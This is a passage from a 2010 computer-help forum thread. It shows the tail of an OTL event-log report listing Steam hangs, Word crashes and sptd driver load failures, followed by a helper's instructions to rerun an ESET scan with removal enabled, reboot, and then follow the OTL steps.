    version 0.0.0.0, hang address 0x00000000.

    Error - 30/10/2010 2:13:57 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    [ OSession Events ]
    Error - 27/10/2010 5:35:28 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 Sessions | ID = 7001
    Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
    12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 13511
    seconds with 5880 seconds of active time. This session ended with a crash.

    Error - 27/10/2010 5:35:54 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 Sessions | ID = 7001
    Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
    12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 2
    seconds with 0 seconds of active time. This session ended with a crash.

    [ System Events ]
    Error - 4/12/2010 5:48:48 AM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 6:58:48 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 6:58:54 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 8:54:31 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 8:54:50 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 10:38:27 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 10:38:27 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 10:44:03 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 10:44:04 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 10:55:45 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd


    < End of report >
     
    Cosmic Jester,
    #17
  19. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    Ok. Run it again but this time check the box to remove those entries.

    Reboot when done, then carry out the OTL directions please.
     
    crunchie,
    #18
  20. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    I am assuming that I run ESET again and check the box to remove the threats, reboot, then run OTL again?
    I didn't get it at first D: But I think I know what you mean, but I will wait for a confirmation.
     
    Cosmic Jester,
    #19
  21. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    I didn't see that you had run OTL already 'cos it was on the next page (for me).
     
    crunchie,
    #20
Page 1 of 3

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...